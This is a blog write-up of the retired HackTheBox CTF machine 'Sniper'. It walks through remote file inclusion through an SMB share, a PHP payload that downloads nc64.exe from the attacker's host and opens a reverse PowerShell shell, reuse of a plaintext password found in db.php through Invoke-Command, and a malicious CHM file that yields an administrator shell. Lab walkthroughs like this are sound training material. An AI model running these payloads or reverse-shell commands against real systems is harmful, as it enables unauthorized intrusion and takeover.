Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
HackTheBox - Sniper
|htbmachinesretired|

Summary

Sniper,a Windows box created by HackTheBox user MinatoTW & felamos , was an overall medium to hard difficulty box.The initial enumeration shows an LFI and a RFI vulnerability in the web application hosted, further to gain access we have setup Samba Server in our Box, and put our malicious payload inside samba share directory. Once everything is done we can upload an nc.exe and get a low privilege shell. Using the shell we see the code of db.php which contains the password for user, use that password with powershell Invoke-Command to get user. The privilege escalation is pretty nice in the box: you will find .chm in downloads of user, And in we get a nice hint. Use a malicious .chm and you will get root.

Enumeration

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Nmap 7.80 scan initiated Fri Dec 27 23:37:41 2019 as: nmap -sC -sV -oN nmap/sniper 10.10.10.151
Nmap scan report for 10.10.10.151
Host is up (0.15s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m57s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-12-28T11:38:06
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 27 23:38:47 2019 -- 1 IP address (1 host up) scanned in 66.10 seconds

Enumerating smb we don’t find anything interesting so lets focus on web.

gobuster scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.151/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2019/12/27 23:44:03 Starting gobuster
===============================================================
/index.php (Status: 200)
/images (Status: 301)
/blog (Status: 301)
/user (Status: 301)
/css (Status: 301)
/js (Status: 301)

viewing each pages we see that /blog has an File Inclusion on lang variable. we can confirm that by viewing http://10.10.10.151/blog/?lang=./css/style.css.

Trying to use that as a RFI we see we can connect to a SMB server but not HTTP. so we setup a smb-server using samba on kali (smbd). as impacket smb was not working for some reason. 

1
2
3
4
5
6
# Adrian's share
[share]
  comment = YOUR COMMENTS
  path = /your-share-folder
  read only = no
  guest ok = yes

I wrote a php script to upload and execute a nc.exe to get a low-privilege shell.

1
2
3
<?=
system("powershell IWR http://10.10.X.X:8000/nc64.exe -outfile \\Microsoft\\nc64.exe;\\Microsoft\\nc64.exe 10.10.X.X YYYY -e powershell.exe 2>&1")
?>

and have a listener waiting, and we get a connection back in few seconds.

User

once we have a shell we enumerate the box and we see a db.php which contain a password.

After some recon we find the creds is for Chris user. and not in thash format. so we can use Invoke-Command to get another shell as Chris

1
2
3
4
5
$user = 'sniper\chris'
$passwd = '36mEAhz/B8xQ~2VM'
$secpass = ConvertTo-SecureString $passwd -AsPlainText -Force
$cred = new-object system.management.automation.PSCredential $user,$secpass
Invoke-Command -computername 127.0.0.1 -ScriptBlock { C:\Microsoft\nc64.exe 10.10.X.X ZZZZ -e powershell.exe } -credential $cred

once we have the shell we can read user.txt 21f4d0f29fc4dd867500c1ad716cf56e

Privilege Escalation

In Chris Download folder we have found one file instructions.chm and after some recon and searching we see it is vulnerable to RCE.

*Note: CHM is Microsoft Compiled HTML Help.

After some recon we see in C:\Docs there is a notes.txt which contain a hint that we need to upload a malicious CHM to get Administrator.

1
2
3
4
5
Hi Chris,
        Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.

And I hope that you've prepared the documentation for our new app

so we create a malicious CHM using OutCHM.ps1

1
Out-CHM -Payload "c:\windows\system32\spool\drivers\color\nc.exe 10.10.X.X 1234 -e cmd" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

and we upload that to C:\Docs folder and wait for sometime to execute the file and get an Admin shell.

and we can grab root.txt 5624caf363e2750e994f6be0b7436c15

and we have pwned Sniper 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/sniper/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
writeupretiredhacktheboxmediumlfiwindowsrfimalicious-chm